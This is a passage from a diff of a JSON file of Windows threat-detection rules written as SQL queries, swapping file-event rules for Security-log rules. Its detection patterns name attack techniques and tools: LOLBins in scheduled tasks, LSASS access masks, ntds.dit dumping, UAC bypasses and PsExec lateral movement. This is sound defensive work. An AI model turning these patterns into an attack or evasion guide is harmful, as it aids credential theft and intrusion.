'%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' 
OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_create_non_existent_dlls.yml" + "filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", - "status": "experimental", - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" - ], + "title": "Locked Workstation", + "id": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", + "status": "stable", + "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. 
Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", + "author": "Alexandr Yampolskyi, SOC Prime", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4800')" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_workstation_was_locked.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", - "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrators that use checkadmin.exe tool to 
enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", - "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "title": "Failed Code Integrity Checks", + "id": "470ec5fa-7b4e-4071-b200-4c753100f49b", + "status": "stable", + "description": "Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027.001" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. 
It is recommended to search for anomalies inidicative of malware." + "Disk device errors" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('5038', '6281'))" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + "filename": "win_security_susp_codeintegrity_check_failure.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Admin User Remote Logon", + "id": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "status": "test", + "description": "Detect remote login by Administrator user (depending on internal pattern).", + "author": "juju4", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.t1078.001", + "attack.t1078.002", + "attack.t1078.003", + "car.2016-04-005" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Legitimate administrative activity." 
], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND AuthenticationPackageName = 'Negotiate' AND TargetUserName LIKE 'Admin%' ESCAPE '\\')" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_admin_rdp_login.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", "status": "test", - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' 
ESCAPE '\\'))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Service Installed By Unusual Client - Security", + "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Suspicious NTDS.DIT Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", - "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "status": 
"experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", - "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "title": "KrbRelayUp Attack Pattern", + "id": 
"749c9f5e-b353-4b90-a9c1-05243357ca4b", + "status": "experimental", + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.credential_access" ], "falsepositives": [ 
@@ -39375,1280 +39406,1325 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "New Outlook Macro Created", - "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "@ScoubiMtl", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "User genuinely creates a VB Macro for their email" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE 
'\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_outlook_macro_creation.yml" + "filename": "win_security_susp_psexec.yml" }, { - "title": "VsCode Powershell Profile Modification", - "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", - "status": "experimental", - "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD User Enumeration", + "id": "ab6bffca-beff-4baa-af11-6733f296d57a", + "status": "test", + "description": "Detects access to a domain user from a non-machine account", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Legitimate use of the profile by developers or administrators" + "Administrators configuring new users." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_vscode_powershell_profile.yml" + "filename": "win_security_ad_user_enumeration.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "title": "Tap Driver Installation - Security", + "id": "9c8afa4d-0022-48f0-9456-3712466f9701", "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ "attack.exfiltration", - "attack.t1567.002" + "attack.t1048" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_tap_driver_installation.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "title": "Azure AD Health Monitoring Agent Registry Keys Access", + "id": 
"ff151c33-45fa-475d-af4f-c2f93571f4fe", "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" }, { - "title": "Dynamic CSharp Compile Artefact", - "id": 
"e4a74e34-ecde-4aab-b2fb-9112dd01aed0", - "status": "test", - "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", - "author": "frack113", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "status": "experimental", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1027.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.cmdline' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_csharp_compile_artefact.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "OneNote Attachment File Dropped In Suspicious Location", - "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", - "status": "experimental", - "description": "Detects creation of files with 
the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Service Activity via SVCCTL Named Pipe", + "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", + "status": "test", + "description": "Detects remote service activity via remote access to the svcctl named pipe", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement", + "attack.persistence", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate usage of \".one\" or \".onepkg\" files from those locations" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" + "filename": "win_security_svcctl_remote_service.yml" }, { - "title": "Suspicious LNK Double Extension Files", - "id": "3215aa19-f060-4332-86d5-5602511f3ca8", - "status": "experimental", - "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "status": "test", + "description": "Detects 
activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Users creating a shortcut on e.g. desktop" + "Administrator activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_lnk_double_extension.yml" 
+ "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", - "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "status": "test", + "description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ + "attack.discovery", + "attack.t1012", "attack.credential_access", - "attack.t1003.001" + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' 